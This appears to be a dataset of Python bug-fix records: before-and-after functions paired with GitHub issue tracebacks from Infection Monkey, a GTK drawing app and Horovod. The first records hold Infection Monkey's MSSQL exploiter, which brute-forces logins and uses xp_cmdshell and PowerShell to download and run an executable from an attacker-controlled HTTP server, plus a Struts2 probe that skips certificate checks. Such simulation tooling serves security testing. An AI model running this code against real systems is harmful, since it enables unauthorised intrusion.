'xp_cmdshell "<nul set /p=%s %s >%s"' % (dst_path, DROPPER_ARG, tmp_file_path)
]
commands.extend(monkey_args)
MSSQLExploiter.execute_command(cursor, commands)
MSSQLExploiter.run_file(cursor, tmp_file_path)
return True
|
def exploit_host(self):
# Brute force to get connection
username_passwords_pairs_list = self._config.get_exploit_user_password_pairs()
cursor = self.brute_force(
self.host.ip_addr, self.SQL_DEFAULT_TCP_PORT, username_passwords_pairs_list
)
if not cursor:
LOG.error("Bruteforce process failed on host: {0}".format(self.host.ip_addr))
return False
        # Get monkey exe for host and its path
src_path = tools.get_target_monkey(self.host)
if not src_path:
LOG.info("Can't find suitable monkey executable for host %r", self.host)
return False
        # Create server for http download and wait for its startup.
http_path, http_thread = HTTPTools.create_locked_transfer(self.host, src_path)
if not http_path:
LOG.debug("Exploiter failed, http transfer creation failed.")
return False
LOG.info("Started http server on %s", http_path)
dst_path = get_monkey_dest_path(http_path)
tmp_file_path = os.path.join(
WormConfiguration.monkey_dir_windows, MSSQLExploiter.TMP_FILE_NAME
)
# Create monkey dir.
commands = ['xp_cmdshell "mkdir %s"' % WormConfiguration.monkey_dir_windows]
MSSQLExploiter.execute_command(cursor, commands)
# Form download command in a file
commands = [
'xp_cmdshell "<nul set /p=powershell (new-object System.Net.WebClient).DownloadFile>%s"'
% tmp_file_path,
"xp_cmdshell \"<nul set /p=(^'%s^' >>%s\"" % (http_path, tmp_file_path),
"xp_cmdshell \"<nul set /p=, ^'%s^') >>%s\"" % (dst_path, tmp_file_path),
]
MSSQLExploiter.execute_command(cursor, commands)
MSSQLExploiter.run_file(cursor, tmp_file_path)
# Form monkey's command in a file
monkey_args = tools.build_monkey_commandline(
self.host, tools.get_monkey_depth() - 1, dst_path
)
monkey_args = [
'xp_cmdshell "<nul set /p=%s >>%s"' % (part, tmp_file_path)
for part in textwrap.wrap(monkey_args, 40)
]
commands = [
'xp_cmdshell "<nul set /p=%s %s >%s"' % (dst_path, DROPPER_ARG, tmp_file_path)
]
commands.extend(monkey_args)
MSSQLExploiter.execute_command(cursor, commands)
MSSQLExploiter.run_file(cursor, tmp_file_path)
return True
|
https://github.com/guardicore/monkey/issues/348
|
2019-06-12 10:19:04,545 [24008:17700:ERROR] main.main.130: Exception thrown from monkey's start function
Traceback (most recent call last):
File "monkey\infection_monkey\main.py", line 121, in main
File "monkey\infection_monkey\monkey.py", line 83, in start
File "monkey\infection_monkey\utils.py", line 46, in create_monkey_dir
WindowsError: [Error 5] Access is denied: 'C:\\Windows\\Temp\\monkey_dir'
|
WindowsError
|
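Functionally, the fix above only reroutes the paths through get_monkey_dir_path() and get_monkey_dest_path() instead of the hardcoded WormConfiguration.monkey_dir_windows (the helper itself appears in a later record). The more unusual technique, present in both versions, is how a long command is smuggled through xp_cmdshell: the command line is wrapped into 40-character chunks, each appended to the same temp file with `<nul set /p=`. A runnable sketch of that trick with illustrative values:

import textwrap

monkey_args = "-p 5000 --depth 2 --server 10.0.0.1:5000"  # illustrative arguments
tmp_file_path = r"C:\monkey_dir\tmp_file.bat"             # illustrative path

# Each xp_cmdshell invocation stays short; the chunks are reassembled by
# appending them to the same file on the target.
commands = [
    'xp_cmdshell "<nul set /p=%s >>%s"' % (part, tmp_file_path)
    for part in textwrap.wrap(monkey_args, 40)
]
for command in commands:
    print(command)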
def is_64bit_windows_os():
"""
Checks for 64 bit Windows OS using environment variables.
"""
return "PROGRAMFILES(X86)" in os.environ
|
def is_64bit_windows_os():
"""
Checks for 64 bit Windows OS using environment variables.
:return:
"""
return "PROGRAMFILES(X86)" in os.environ
|
https://github.com/guardicore/monkey/issues/348
|
2019-06-12 10:19:04,545 [24008:17700:ERROR] main.main.130: Exception thrown from monkey's start function
Traceback (most recent call last):
File "monkey\infection_monkey\main.py", line 121, in main
File "monkey\infection_monkey\monkey.py", line 83, in start
File "monkey\infection_monkey\utils.py", line 46, in create_monkey_dir
WindowsError: [Error 5] Access is denied: 'C:\\Windows\\Temp\\monkey_dir'
|
WindowsError
|
def get_monkey_dir_path():
return os.path.join(tempfile.gettempdir(), WormConfiguration.monkey_dir_name)
|
def get_monkey_dir_path():
if is_windows_os():
return WormConfiguration.monkey_dir_windows
else:
return WormConfiguration.monkey_dir_linux
|
https://github.com/guardicore/monkey/issues/348
|
2019-06-12 10:19:04,545 [24008:17700:ERROR] main.main.130: Exception thrown from monkey's start function
Traceback (most recent call last):
File "monkey\infection_monkey\main.py", line 121, in main
File "monkey\infection_monkey\monkey.py", line 83, in start
File "monkey\infection_monkey\utils.py", line 46, in create_monkey_dir
WindowsError: [Error 5] Access is denied: 'C:\\Windows\\Temp\\monkey_dir'
|
WindowsError
|
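The 'Access is denied' failure comes from the hardcoded C:\Windows\Temp location, which unprivileged users cannot write to. tempfile.gettempdir() consults the TMPDIR/TEMP/TMP environment variables before falling back to a platform default, so the helper now resolves to a directory the current user can actually create. A self-contained sketch (MONKEY_DIR_NAME stands in for WormConfiguration.monkey_dir_name, and create_monkey_dir is a hypothetical companion to the helper):

import os
import tempfile

MONKEY_DIR_NAME = "monkey_dir"  # stand-in for WormConfiguration.monkey_dir_name

def get_monkey_dir_path():
    # Resolve the working directory from the OS temp dir rather than a
    # hardcoded, admin-only location such as C:\Windows\Temp.
    return os.path.join(tempfile.gettempdir(), MONKEY_DIR_NAME)

def create_monkey_dir():
    # exist_ok avoids a race if the directory was already created.
    os.makedirs(get_monkey_dir_path(), exist_ok=True)

create_monkey_dir()
print(get_monkey_dir_path())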
def get_redirected(url):
        # Returns False if the URL cannot be reached
headers = {"User-Agent": "Mozilla/5.0"}
request = urllib2.Request(url, headers=headers)
try:
return urllib2.urlopen(
request, context=ssl._create_unverified_context()
).geturl()
except urllib2.URLError:
LOG.error("Can't reach struts2 server")
return False
|
def get_redirected(url):
        # Returns False if the URL cannot be reached
headers = {"User-Agent": "Mozilla/5.0"}
request = urllib2.Request(url, headers=headers)
try:
return urllib2.urlopen(request).geturl()
except urllib2.URLError:
LOG.error("Can't reach struts2 server")
return False
|
https://github.com/guardicore/monkey/issues/306
|
2019-04-17 15:52:15,293 [23152:22664:ERROR] monkey.start.190: Exception while attacking Victim Host 216.58.207.78: OS - [type-linux ] Services - [tcp-443-{'data': ('gws', True), 'name': 'http'} tcp-80-{'data': ('gws', False), 'name': 'http'} ] target monkey: None using Struts2Exploiter: hostname '216.58.207.78' doesn't match either of '*.google.com', '*.android.com', '*.appengine.google.com', '*.cloud.google.com', '*.crowdsource.google.com', '*.g.co', '*.gcp.gvt2.com', '*.ggpht.cn', '*.google-analytics.com', '*.google.ca', '*.google.cl', '*.google.co.in', '*.google.co.jp', '*.google.co.uk', '*.google.com.ar', '*.google.com.au', '*.google.com.br', '*.google.com.co', '*.google.com.mx', '*.google.com.tr', '*.google.com.vn', '*.google.de', '*.google.es', '*.google.fr', '*.google.hu', '*.google.it', '*.google.nl', '*.google.pl', '*.google.pt', '*.googleadapis.com', '*.googleapis.cn', '*.googlecnapps.cn', '*.googlecommerce.com', '*.googlevideo.com', '*.gstatic.cn', '*.gstatic.com', '*.gstaticcnapps.cn', '*.gvt1.com', '*.gvt2.com', '*.metric.gstatic.com', '*.urchin.com', '*.url.google.com', '*.youtube-nocookie.com', '*.youtube.com', '*.youtubeeducation.com', '*.youtubekids.com', '*.yt.be', '*.ytimg.com', 'android.clients.google.com', 'android.com', 'developer.android.google.cn', 'developers.android.google.cn', 'g.co', 'ggpht.cn', 'goo.gl', 'google-analytics.com', 'google.com', 'googlecnapps.cn', 'googlecommerce.com', 'source.android.google.cn', 'urchin.com', 'www.goo.gl', 'youtu.be', 'youtube.com', 'youtubeeducation.com', 'youtubekids.com', 'yt.be'
Traceback (most recent call last):
File "C:\monkey\monkey\infection_monkey\monkey.py", line 181, in start
result = exploiter.exploit_host()
File "C:\monkey\monkey\infection_monkey\exploit\web_rce.py", line 79, in exploit_host
urls = self.build_potential_urls(ports, exploit_config['url_extensions'])
File "C:\monkey\monkey\infection_monkey\exploit\struts2.py", line 41, in build_potential_urls
url_list = [self.get_redirected(url) for url in url_list]
File "C:\monkey\monkey\infection_monkey\exploit\struts2.py", line 50, in get_redirected
return urllib2.urlopen(request).geturl()
File "C:\Python27\lib\urllib2.py", line 154, in urlopen
return opener.open(url, data, timeout)
File "C:\Python27\lib\urllib2.py", line 429, in open
response = self._open(req, data)
File "C:\Python27\lib\urllib2.py", line 447, in _open
'_open', req)
File "C:\Python27\lib\urllib2.py", line 407, in _call_chain
result = func(*args)
File "C:\Python27\lib\urllib2.py", line 1241, in https_open
context=self._context)
File "C:\Python27\lib\urllib2.py", line 1195, in do_open
h.request(req.get_method(), req.get_selector(), req.data, headers)
File "C:\Python27\lib\httplib.py", line 1042, in request
self._send_request(method, url, body, headers)
File "C:\Python27\lib\httplib.py", line 1082, in _send_request
self.endheaders(body)
File "C:\Python27\lib\httplib.py", line 1038, in endheaders
self._send_output(message_body)
File "C:\Python27\lib\httplib.py", line 882, in _send_output
self.send(msg)
File "C:\Python27\lib\httplib.py", line 844, in send
self.connect()
File "C:\Python27\lib\httplib.py", line 1263, in connect
server_hostname=server_hostname)
File "C:\Python27\lib\ssl.py", line 369, in wrap_socket
_context=self)
File "C:\Python27\lib\ssl.py", line 617, in __init__
self.do_handshake()
File "C:\Python27\lib\ssl.py", line 854, in do_handshake
match_hostname(self.getpeercert(), self.server_hostname)
File "C:\Python27\lib\ssl.py", line 288, in match_hostname
% (hostname, ', '.join(map(repr, dnsnames))))
CertificateError: hostname '216.58.207.78' doesn't match either of '*.google.com', '*.android.com', '*.appengine.google.com', '*.cloud.google.com', '*.crowdsource.google.com', '*.g.co', '*.gcp.gvt2.com', '*.ggpht.cn', '*.google-analytics.com', '*.google.ca', '*.google.cl', '*.google.co.in', '*.google.co.jp', '*.google.co.uk', '*.google.com.ar', '*.google.com.au', '*.google.com.br', '*.google.com.co', '*.google.com.mx', '*.google.com.tr', '*.google.com.vn', '*.google.de', '*.google.es', '*.google.fr', '*.google.hu', '*.google.it', '*.google.nl', '*.google.pl', '*.google.pt', '*.googleadapis.com', '*.googleapis.cn', '*.googlecnapps.cn', '*.googlecommerce.com', '*.googlevideo.com', '*.gstatic.cn', '*.gstatic.com', '*.gstaticcnapps.cn', '*.gvt1.com', '*.gvt2.com', '*.metric.gstatic.com', '*.urchin.com', '*.url.google.com', '*.youtube-nocookie.com', '*.youtube.com', '*.youtubeeducation.com', '*.youtubekids.com', '*.yt.be', '*.ytimg.com', 'android.clients.google.com', 'android.com', 'developer.android.google.cn', 'developers.android.google.cn', 'g.co', 'ggpht.cn', 'goo.gl', 'google-analytics.com', 'google.com', 'googlecnapps.cn', 'googlecommerce.com', 'source.android.google.cn', 'urchin.com', 'www.goo.gl', 'youtu.be', 'youtube.com', 'youtubeeducation.com', 'youtubekids.com', 'yt.be'
|
CertificateError
|
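The CertificateError happens because the exploiter probes hosts by raw IP address, which never matches the DNS names in the server certificate; passing ssl._create_unverified_context() disables certificate and hostname verification for this reconnaissance request, whose response is only used to follow redirects. The record itself is Python 2 (urllib2); the same idea in Python 3, as a sketch with logging omitted:

import ssl
import urllib.error
import urllib.request

def get_redirected(url):
    # Returns False if the URL cannot be reached.
    headers = {"User-Agent": "Mozilla/5.0"}
    request = urllib.request.Request(url, headers=headers)
    try:
        # _create_unverified_context() skips chain and hostname checks, so
        # probing e.g. "https://216.58.207.78/" no longer raises CertificateError.
        return urllib.request.urlopen(
            request, context=ssl._create_unverified_context()
        ).geturl()
    except urllib.error.URLError:
        return False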
def _show_text_with_options(self, cc, pl, text, text_x, text_y):
cc.move_to(text_x, text_y)
pl.set_text(text, -1)
PangoCairo.update_layout(cc, pl)
PangoCairo.show_layout(cc, pl)
|
def _show_text_with_options(self, cc, pl, text, text_x, text_y):
cc.move_to(text_x, text_y)
pl.set_text(text)
PangoCairo.update_layout(cc, pl)
PangoCairo.show_layout(cc, pl)
|
https://github.com/maoschanz/drawing/issues/275
|
Traceback (most recent call last):
File "/usr/share/drawing/drawing/tool_text.py", line 184, in _preview_text
self.do_tool_operation(operation)
File "/usr/share/drawing/drawing/tool_text.py", line 251, in do_tool_operation
entire_text, text_x + dx, text_y + dy)
File "/usr/share/drawing/drawing/tool_text.py", line 264, in _show_text_with_options
pl.set_text(text)
TypeError: Pango.Layout.set_text() takes exactly 3 arguments (2 given)
|
TypeError
|
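In the PyGObject bindings, Pango.Layout.set_text is introspected from the C signature pango_layout_set_text(layout, text, length): the length argument is required, and passing -1 tells Pango the string is NUL-terminated and should be measured by Pango itself, which is exactly what the fix does. A minimal standalone sketch of the corrected call (requires PyGObject with PangoCairo and pycairo; the drawing setup from tool_text.py is omitted):

import gi
gi.require_version("PangoCairo", "1.0")
from gi.repository import PangoCairo
import cairo

surface = cairo.ImageSurface(cairo.FORMAT_ARGB32, 200, 50)
cc = cairo.Context(surface)
pl = PangoCairo.create_layout(cc)

pl.set_text("hello", -1)  # length -1: let Pango measure the string itself
PangoCairo.update_layout(cc, pl)
PangoCairo.show_layout(cc, pl)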
def _set_active_type(self, *args):
state_as_string = self.get_option_value("filters_type")
self._reset_type_values()
if state_as_string == "blur_fast":
self.blur_algo = BlurType.CAIRO_REPAINTS
self.type_label = _("Fast blur")
elif state_as_string == "blur_slow":
self.blur_algo = BlurType.PX_BOX
self.type_label = _("Slow blur")
elif state_as_string == "tiles":
self.blur_algo = BlurType.TILES
self.type_label = _("Pixelization")
elif state_as_string == "saturation":
self.saturate = True
self.type_label = _("Change saturation")
elif state_as_string == "veil":
self.pixelate = True
self.type_label = _("Veil")
elif state_as_string == "invert":
self.invert = True
self.type_label = _("Invert colors")
elif state_as_string == "transparency":
self.transparency = True
self.type_label = _("Add transparency")
else:
self.type_label = _("Select a filter…")
self.bar.on_filter_changed()
|
def _set_active_type(self, *args):
state_as_string = self.get_option_value("filters_type")
self._reset_type_values()
if state_as_string == "blur_fast":
self.blur_algo = BlurType.CAIRO_REPAINTS
self.type_label = _("Fast blur")
elif state_as_string == "blur_slow":
self.blur_algo = BlurType.PX_BOX
self.type_label = _("Slow blur")
elif state_as_string == "tiles":
self.blur_algo = BlurType.TILES
self.type_label = _("Pixelation")
elif state_as_string == "saturation":
self.saturate = True
self.type_label = _("Change saturation")
elif state_as_string == "veil":
self.pixelate = True
self.type_label = _("Veil")
elif state_as_string == "invert":
self.invert = True
self.type_label = _("Invert colors")
elif state_as_string == "transparency":
self.transparency = True
self.type_label = _("Add transparency")
else:
self.type_label = _("Select a filter…")
self.bar.on_filter_changed()
|
https://github.com/maoschanz/drawing/issues/275
|
Traceback (most recent call last):
File "/usr/share/drawing/drawing/tool_text.py", line 184, in _preview_text
self.do_tool_operation(operation)
File "/usr/share/drawing/drawing/tool_text.py", line 251, in do_tool_operation
entire_text, text_x + dx, text_y + dy)
File "/usr/share/drawing/drawing/tool_text.py", line 264, in _show_text_with_options
pl.set_text(text)
TypeError: Pango.Layout.set_text() takes exactly 3 arguments (2 given)
|
TypeError
|
def __init__(self, window, **kwargs):
super().__init__("select", _("Selection"), "tool-select-symbolic", window)
self.use_color = False
self.accept_selection = True
self.selected_type_id = "rectangle"
self.selected_type_label = _("Rectangle selection")
self.closing_x = 0
self.closing_y = 0
self.x_press = 0
self.y_press = 0
self.future_x = 0
self.future_y = 0
self.future_path = None
self.future_pixbuf = None
self.operation_type = None # 'op-define'
self.behavior = "rectangle"
self.add_tool_action_enum("selection_type", self.selected_type_id)
# Special bottom panel TODO common to the 3 types
builder = Gtk.Builder.new_from_resource(
"/com/github/maoschanz/drawing/tools/ui/tool_select.ui"
)
self.bottom_panel = builder.get_object("bottom-panel")
actions_menu = builder.get_object("actions-menu")
builder.get_object("actions_btn").set_menu_model(actions_menu)
self.import_box_narrow = builder.get_object("import_box_narrow")
self.import_box_long = builder.get_object("import_box_long")
self.minimap_label = builder.get_object("minimap_label")
self.minimap_arrow = builder.get_object("minimap_arrow")
self.minimap_icon = builder.get_object("minimap_icon")
self.window.bottom_panel_box.add(self.bottom_panel)
self.implements_panel = True
        # self.needed_width_for_long = XXX TODO currently hardcoded
self.needed_width_for_long = 450
|
def __init__(self, window, **kwargs):
super().__init__("select", _("Selection"), "tool-select-symbolic", window)
self.use_color = False
self.accept_selection = True
self.selected_type_id = "rectangle"
self.selected_type_label = _("Rectangle selection")
self.closing_x = 0
self.closing_y = 0
self.x_press = 0
self.y_press = 0
self.future_x = 0
self.future_y = 0
self.future_path = None
self.future_pixbuf = None
self.operation_type = None # 'op-define'
self.behavior = "rectangle"
self.add_tool_action_enum("selection_type", self.selected_type_id)
# Special bottom panel TODO common to the 3 types
builder = Gtk.Builder.new_from_resource(
"/com/github/maoschanz/drawing/tools/ui/tool_select.ui"
)
self.bottom_panel = builder.get_object("bottom-panel")
actions_menu = builder.get_object("actions-menu")
builder.get_object("actions_btn").set_menu_model(actions_menu)
self.import_box_narrow = builder.get_object("import_box_narrow")
self.import_box_long = builder.get_object("import_box_long")
self.minimap_label = builder.get_object("minimap_label")
self.minimap_arrow = builder.get_object("minimap_arrow")
self.minimap_icon = builder.get_object("minimap_icon")
self.window.bottom_panel_box.add(self.bottom_panel)
self.implements_panel = True
        # self.needed_width_for_long = XXX TODO currently hardcoded
self.needed_width_for_long = 400
|
https://github.com/maoschanz/drawing/issues/70
|
Traceback (most recent call last):
File "/usr/bin/drawing", line 42, in <module>
from drawing import main
File "/usr/share/drawing/drawing/main.py", line 23, in <module>
from .window import DrawingWindow
File "/usr/share/drawing/drawing/window.py", line 40, in <module>
from .image import DrawingImage
File "/usr/share/drawing/drawing/image.py", line 31, in <module>
@Gtk.Template(resource_path='/com/github/maoschanz/drawing/ui/image.ui')
File "/usr/lib/python3/dist-packages/gi/overrides/__init__.py", line 39, in __getattr__
return getattr(self._introspection_module, name)
File "/usr/lib/python3/dist-packages/gi/module.py", line 137, in __getattr__
self.__name__, name))
AttributeError: 'gi.repository.Gtk' object has no attribute 'Template'
|
AttributeError
|
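The diff above only adjusts needed_width_for_long (450 vs 400); the AttributeError in the traceback is an environment problem, since the Gtk.Template decorator only exists in newer PyGObject releases (added around 3.30). A hedged sketch of a startup guard an application could add, assuming nothing beyond gi itself:

import sys

import gi
gi.require_version("Gtk", "3.0")
from gi.repository import Gtk

# Gtk.Template is resolved lazily through gi's overrides, so hasattr() is a
# cheap way to detect PyGObject versions that predate it.
if not hasattr(Gtk, "Template"):
    sys.exit(
        "This application needs a PyGObject with Gtk.Template support "
        "(roughly >= 3.30); found %s" % ".".join(map(str, gi.version_info))
    )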
def set_tools_labels_visibility(self, visible):
"""Change the way tools are displayed in the side panel. Visible labels
mean the tools will be arranged in a scrollable list of buttons, else
        they will be in an adaptive flowbox."""
for tool_id in self.tools:
self.tools[tool_id].label_widget.set_visible(visible)
nb_tools = len(self.tools)
if visible:
self.tools_panel.set_min_children_per_line(nb_tools)
self.tools_nonscrollable_box.remove(self.tools_panel)
self.tools_scrollable_box.add(self.tools_panel)
else:
self.tools_scrollable_box.remove(self.tools_panel)
self.tools_nonscrollable_box.add(self.tools_panel)
nb_min = int((nb_tools + (nb_tools % 3)) / 3) - 1
self.tools_panel.set_min_children_per_line(nb_min)
self.tools_panel.set_max_children_per_line(nb_tools)
|
def set_tools_labels_visibility(self, visible):
"""Change the way tools are displayed in the side panel. Visible labels
mean the tools will be arranged in a scrollable list of buttons, else
        they will be in an adaptive flowbox."""
for tool_id in self.tools:
self.tools[tool_id].label_widget.set_visible(visible)
nb_tools = len(self.tools)
if visible:
if self.tools_panel.get_parent() is self.tools_nonscrollable_box:
self.tools_nonscrollable_box.remove(self.tools_panel)
self.tools_scrollable_box.add(self.tools_panel)
self.tools_panel.set_min_children_per_line(nb_tools)
else:
if self.tools_panel.get_parent() is self.tools_scrollable_box:
self.tools_scrollable_box.remove(self.tools_panel)
self.tools_nonscrollable_box.add(self.tools_panel)
            # FIXME button width is broken
nb_tools = len(self.tools)
self.tools_panel.set_min_children_per_line((nb_tools + (nb_tools % 3)) / 3)
self.tools_panel.set_max_children_per_line(nb_tools)
|
https://github.com/maoschanz/drawing/issues/70
|
Traceback (most recent call last):
File "/usr/bin/drawing", line 42, in <module>
from drawing import main
File "/usr/share/drawing/drawing/main.py", line 23, in <module>
from .window import DrawingWindow
File "/usr/share/drawing/drawing/window.py", line 40, in <module>
from .image import DrawingImage
File "/usr/share/drawing/drawing/image.py", line 31, in <module>
@Gtk.Template(resource_path='/com/github/maoschanz/drawing/ui/image.ui')
File "/usr/lib/python3/dist-packages/gi/overrides/__init__.py", line 39, in __getattr__
return getattr(self._introspection_module, name)
File "/usr/lib/python3/dist-packages/gi/module.py", line 137, in __getattr__
self.__name__, name))
AttributeError: 'gi.repository.Gtk' object has no attribute 'Template'
|
AttributeError
|
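The rewritten set_tools_labels_visibility always detaches the panel from its current container before attaching it to the other one, instead of guarding each branch with get_parent(); in GTK3 a widget can have at most one parent, and add()-ing an already-parented widget is rejected with a Gtk-WARNING. A tiny sketch of the reparenting idiom (needs a working GTK3 environment to run):

import gi
gi.require_version("Gtk", "3.0")
from gi.repository import Gtk

box_a = Gtk.Box()
box_b = Gtk.Box()
child = Gtk.Label(label="tools panel")

box_a.add(child)
# Moving the child: remove from the old parent first, then add; calling
# box_b.add(child) directly would warn and leave the widget where it was.
box_a.remove(child)
box_b.add(child)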
def set_compact(self, state): # TODO state as an int
if state:
self.main_menu_btn.set_menu_model(self.long_main_menu)
else:
self.main_menu_btn.set_menu_model(self.short_main_menu)
self.save_label.set_visible(not state)
self.save_icon.set_visible(state)
self.hidable_widget.set_visible(not state)
self.new_btn.set_visible(not state)
self.is_narrow = state
|
def set_compact(self, state):
if state:
self.main_menu_btn.set_menu_model(self.long_main_menu)
else:
self.main_menu_btn.set_menu_model(self.short_main_menu)
self.save_label.set_visible(not state)
self.save_icon.set_visible(state)
self.hidable_widget.set_visible(not state)
self.new_btn.set_visible(not state)
self.is_narrow = state
|
https://github.com/maoschanz/drawing/issues/70
|
Traceback (most recent call last):
File "/usr/bin/drawing", line 42, in <module>
from drawing import main
File "/usr/share/drawing/drawing/main.py", line 23, in <module>
from .window import DrawingWindow
File "/usr/share/drawing/drawing/window.py", line 40, in <module>
from .image import DrawingImage
File "/usr/share/drawing/drawing/image.py", line 31, in <module>
@Gtk.Template(resource_path='/com/github/maoschanz/drawing/ui/image.ui')
File "/usr/lib/python3/dist-packages/gi/overrides/__init__.py", line 39, in __getattr__
return getattr(self._introspection_module, name)
File "/usr/lib/python3/dist-packages/gi/module.py", line 137, in __getattr__
self.__name__, name))
AttributeError: 'gi.repository.Gtk' object has no attribute 'Template'
|
AttributeError
|
def _exec_middleman(command, env, exit_event, stdout, stderr, rw):
stdout_r, stdout_w = stdout
stderr_r, stderr_w = stderr
r, w = rw
# Close unused file descriptors to enforce PIPE behavior.
stdout_r.close()
stderr_r.close()
w.close()
os.setsid()
executor_shell = subprocess.Popen(
command, shell=True, env=env, stdout=stdout_w, stderr=stderr_w
)
    # we don't bother stopping the on_event thread; this process sys.exits soon
# so the on_event thread has to be a daemon thread
on_event(
exit_event,
terminate_executor_shell_and_children,
args=(executor_shell.pid,),
daemon=True,
)
def kill_executor_children_if_parent_dies():
# This read blocks until the pipe is closed on the other side
# due to parent process termination (for any reason, including -9).
os.read(r.fileno(), 1)
terminate_executor_shell_and_children(executor_shell.pid)
in_thread(kill_executor_children_if_parent_dies)
exit_code = executor_shell.wait()
if exit_code < 0:
# See: https://www.gnu.org/software/bash/manual/html_node/Exit-Status.html
exit_code = 128 + abs(exit_code)
sys.exit(exit_code)
|
def _exec_middleman(command, env, exit_event, stdout, stderr, rw):
stdout_r, stdout_w = stdout
stderr_r, stderr_w = stderr
r, w = rw
# Close unused file descriptors to enforce PIPE behavior.
stdout_r.close()
stderr_r.close()
w.close()
os.setsid()
executor_shell = subprocess.Popen(
command, shell=True, env=env, stdout=stdout_w, stderr=stderr_w
)
    # we don't bother stopping the on_event thread; this process sys.exits soon
# so the on_event thread has to be a deamon thread
on_event(
exit_event,
terminate_executor_shell_and_children,
args=(executor_shell.pid,),
daemon=True,
)
def kill_executor_children_if_parent_dies():
# This read blocks until the pipe is closed on the other side
# due to parent process termination (for any reason, including -9).
os.read(r.fileno(), 1)
terminate_executor_shell_and_children(executor_shell.pid)
in_thread(kill_executor_children_if_parent_dies)
exit_code = executor_shell.wait()
if exit_code < 0:
# See: https://www.gnu.org/software/bash/manual/html_node/Exit-Status.html
exit_code = 128 + abs(exit_code)
sys.exit(exit_code)
|
https://github.com/horovod/horovod/issues/2367
|
Tue Oct 13 10:54:25 2020[0]<stderr>:[10/13/2020 10:54:25 - INFO - __main__ - start running validation...
Tue Oct 13 10:54:25 2020[0]<stderr>: 0%| | 0/1327 [00:00<?, ?it/s]
Tue Oct 13 10:55:56 2020[0]<stderr>:
Exception in thread Thread-17:derr>: 65%|██████▌ | 866/1327 [01:17<00:47, 9.80it/s]
Traceback (most recent call last):
File "/data/anaconda3/envs/vcr/lib/python3.6/threading.py", line 916, in _bootstrap_inner
self.run()
File "/data/anaconda3/envs/vcr/lib/python3.6/threading.py", line 864, in run
self._target(*self._args, **self._kwargs)
File "/data/anaconda3/envs/vcr/lib/python3.6/site-packages/horovod/runner/common/util/safe_shell_exec.py", line 104, in forward_stream
text = text.decode('utf-8')
UnicodeDecodeError: 'utf-8' codec can't decode byte 0xe2 in position 999: unexpected end of data
Tue Oct 13 10:58:56 2020[3]<stderr>:[2020-10-13 10:58:56.365049: E /dockerdata/app/tmp/pip-install-998q9kn4/horovod/horovod/common/operations.cc:525] Horovod background loop uncaught exception: [/dockerdata/app/tmp/pip-install-998q9kn4/horovod/third_party/compatible_gloo/gloo/transport/tcp/unbound_buffer.cc:84] Timed out waiting 30000ms for recv operation to complete
Tue Oct 13 10:58:56 2020[2]<stderr>:[2020-10-13 10:58:56.366492: E /dockerdata/app/tmp/pip-install-998q9kn4/horovod/horovod/common/operations.cc:525] Horovod background loop uncaught exception: [/dockerdata/app/tmp/pip-install-998q9kn4/horovod/third_party/compatible_gloo/gloo/transport/tcp/unbound_buffer.cc:84] Timed out waiting 30000ms for recv operation to complete
Tue Oct 13 10:58:56 2020[1]<stderr>:[2020-10-13 10:58:56.366674: E /dockerdata/app/tmp/pip-install-998q9kn4/horovod/horovod/common/operations.cc:525] Horovod background loop uncaught exception: [/dockerdata/app/tmp/pip-install-998q9kn4/horovod/third_party/compatible_gloo/gloo/transport/tcp/unbound_buffer.cc:136] Timed out waiting 30000ms for send operation to complete
Tue Oct 13 10:58:56 2020[3]<stderr>:Traceback (most recent call last):
Tue Oct 13 10:58:56 2020[1]<stderr>:Traceback (most recent call last):
Tue Oct 13 10:58:56 2020[3]<stderr>: File "/data/anaconda3/envs/vcr/lib/python3.6/site-packages/horovod/torch/mpi_ops.py", line 622, in synchronize
Tue Oct 13 10:58:56 2020[2]<stderr>:Traceback (most recent call last):
Tue Oct 13 10:58:56 2020[3]<stderr>: mpi_lib.horovod_torch_wait_and_clear(handle)
Tue Oct 13 10:58:56 2020[2]<stderr>: File "/data/anaconda3/envs/vcr/lib/python3.6/site-packages/horovod/torch/mpi_ops.py", line 622, in synchronize
Tue Oct 13 10:58:56 2020[3]<stderr>:RuntimeError: Horovod has been shut down. This was caused by an exception on one of the ranks or an attempt to allreduce, allgather or broadcast a tensor after one of the ranks finished execution. If the shutdown was caused by an exception, you should see the exception in the log before the first shutdown message.
Tue Oct 13 10:58:56 2020[1]<stderr>: File "/data/anaconda3/envs/vcr/lib/python3.6/site-packages/horovod/torch/mpi_ops.py", line 622, in synchronize
Tue Oct 13 10:58:56 2020[3]<stderr>:
Tue Oct 13 10:58:56 2020[1]<stderr>: mpi_lib.horovod_torch_wait_and_clear(handle)
Tue Oct 13 10:58:56 2020[2]<stderr>: mpi_lib.horovod_torch_wait_and_clear(handle)
Tue Oct 13 10:58:57 2020[3]<stderr>:During handling of the above exception, another exception occurred:
Tue Oct 13 10:58:57 2020[2]<stderr>:RuntimeError: Horovod has been shut down. This was caused by an exception on one of the ranks or an attempt to allreduce, allgather or broadcast a tensor after one of the ranks finished execution. If the shutdown was caused by an exception, you should see the exception in the log before the first shutdown message.
Tue Oct 13 10:58:57 2020[1]<stderr>:RuntimeError: Horovod has been shut down. This was caused by an exception on one of the ranks or an attempt to allreduce, allgather or broadcast a tensor after one of the ranks finished execution. If the shutdown was caused by an exception, you should see the exception in the log before the first shutdown message.
Tue Oct 13 10:58:57 2020[3]<stderr>:
Tue Oct 13 10:58:57 2020[1]<stderr>:
Tue Oct 13 10:58:57 2020[2]<stderr>:
Tue Oct 13 10:58:57 2020[3]<stderr>:Traceback (most recent call last):
Tue Oct 13 10:58:57 2020[2]<stderr>:During handling of the above exception, another exception occurred:
Tue Oct 13 10:58:57 2020[1]<stderr>:During handling of the above exception, another exception occurred:
Tue Oct 13 10:58:57 2020[3]<stderr>: File "train_vcr.py", line 332, in <module>
Tue Oct 13 10:58:57 2020[1]<stderr>:
Tue Oct 13 10:58:57 2020[3]<stderr>: main(parse_cmd_args(TrainingOpts))
Tue Oct 13 10:58:57 2020[1]<stderr>:Traceback (most recent call last):
Tue Oct 13 10:58:57 2020[3]<stderr>: File "train_vcr.py", line 260, in main
Tue Oct 13 10:58:57 2020[1]<stderr>: File "train_vcr.py", line 332, in <module>
Tue Oct 13 10:58:57 2020[3]<stderr>: val_log = validate(model, val_dataloader)
Tue Oct 13 10:58:57 2020[1]<stderr>: main(parse_cmd_args(TrainingOpts))
Tue Oct 13 10:58:57 2020[3]<stderr>: File "/data/anaconda3/envs/vcr/lib/python3.6/site-packages/torch/autograd/grad_mode.py", line 49, in decorate_no_grad
Tue Oct 13 10:58:57 2020[1]<stderr>: File "train_vcr.py", line 260, in main
